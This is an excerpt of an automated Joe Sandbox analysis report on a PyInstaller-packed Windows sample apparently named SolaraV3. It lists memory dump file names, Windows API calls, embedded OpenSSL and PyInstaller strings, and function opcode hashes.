                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                              • Instruction ID: 3ba90b57abc033802a6f73968ec955b1af2912bec75d2ea29a7ab1daa42ad204
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14116030F0C68A86FA585729566113D62429F447F0F146736E83EC76D6DE2CA4738300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007A3440ErrorLast
                                                                                                                                                                                                                              • String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
                                                                                                                                                                                                                              • API String ID: 848807496-4291904164
                                                                                                                                                                                                                              • Opcode ID: 43a2a23570172f1492d2df20069b1eec957ebead7fe1968015ea09c30e310cbe
                                                                                                                                                                                                                              • Instruction ID: 9ebb58185fb1ef5984ec9fb19be192658061b30feb45db2c24cfae61b01d3152
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43a2a23570172f1492d2df20069b1eec957ebead7fe1968015ea09c30e310cbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D17194E1A2C68686FA20AB75D459FFE63A0AF85784F444031EB4E17B96DF3CE4419704
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressProc
                                                                                                                                                                                                                              • String ID: OPENSSL_Uplink(%p,%02X):
                                                                                                                                                                                                                              • API String ID: 1883125708-1089269818
                                                                                                                                                                                                                              • Opcode ID: 4ccc3ce23c4402700d34cdd1b44a20b3c7d878ed7d0ac8f9f23aaafae92de14e
                                                                                                                                                                                                                              • Instruction ID: f4bc345b675a8e63b2d0711bd3261ba5d6eb77a168ea5c2db84aa96146a2a98e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ccc3ce23c4402700d34cdd1b44a20b3c7d878ed7d0ac8f9f23aaafae92de14e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8351FCA5D08B4286E6158F38E800A7533A0FF59B64B44D736D96F822B6EF3CB695C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6DC701B6A), ref: 00007FF6DC70295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                              • Instruction ID: 52007a145e6001d1a4f92277134af69f6b3d16f96283a07eddd00bc2d0bec1bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D31F623B18A8956E7209766A8512EF66A4BF887D4F400133FE8DD3789EF3CD1578700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                                                                                                                                                                                              • Instruction ID: f87a8971a6a07dffa7b8405072eba2ab3beb5a87b21ef52bd23ffd51ff5ec390
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1317372A19A8689EB20DF25E8652FD6360FF88784F540136EA4E87B99DF3CD116C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6DC70918F,?,00007FF6DC703C55), ref: 00007FF6DC702BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6DC702C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction ID: 4d3c1e3fea9780c66f6163453185013722541ed139eca782b23bf3d1631b11b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF21DE62708B8582E7219B15F8907EE63A4FB88784F400136EA8D93659DE3CE266C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6DC701B99), ref: 00007FF6DC702760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction ID: 3d73c88f342bad0709f15477228df80d71bb404cafae940d004e271bdf60c224
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52219272A18B8946E720DB55F8517EAA3A4FB88384F400136FE8D93659DF7CD15A8740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction ID: 60ba1b9f53e9d0e0ca73b16e237b5a41758d923d8acb65d232e4b7e1a499a37d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58F06221B0970A81EA209B24E4A437EA360FF497A1F541237D67E865E4DF2CE05BC340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: d7fcc1fdc0fdb477ba1f4b37f16fb16faab36ff8ad3d1c3f55781e2e7658b93e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17115432E5CA0B01FA781165E4B537D9150AF59374E0C4637FA6ED62D7DE6C69638100
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3AF
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3CE
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3F6
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B407
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B418
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                              • Instruction ID: 51120308e5bf071dd94d868f5809307f97b34f3bc09d3dc409e30dfe0c420366
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90111F70F0864A81FA58972A956117D62519F447F0F58A336E93DC66D6DE2CA4638201
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                              • Instruction ID: 3f78b665e5481f3394af489ebaf854d9d232443db26f784891be9587faa9d7f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03110960F0C60F85F9686279457217E12824F4A770F18A736E93ECA6D2DD2CB4679311
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
                                                                                                                                                                                                                              • API String ID: 3568877910-1441847574
                                                                                                                                                                                                                              • Opcode ID: a7d4c1d8856ac1d26af83218d8943a4bdd86404aee8b91189861af3a8a8d4159
                                                                                                                                                                                                                              • Instruction ID: 1ad43dc7735d653f941148aac2fedbddcee8094a0beac87a8849442ea40800e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7d4c1d8856ac1d26af83218d8943a4bdd86404aee8b91189861af3a8a8d4159
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CF18DF261CA8185E720CB29E488FADB7A1FB85B84F048135DA8D87795DF7DE591C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: $..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                              • API String ID: 3568877910-2024727245
                                                                                                                                                                                                                              • Opcode ID: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
                                                                                                                                                                                                                              • Instruction ID: c70b3012f65f5c53e76c33fe3f9b8233d6b4623b385fcaf12f5a4b410792cd09
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23C178F2A2868282FB559A36D858FF963A1EF84B84F044135DE0D4B789CF3DE545C744
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
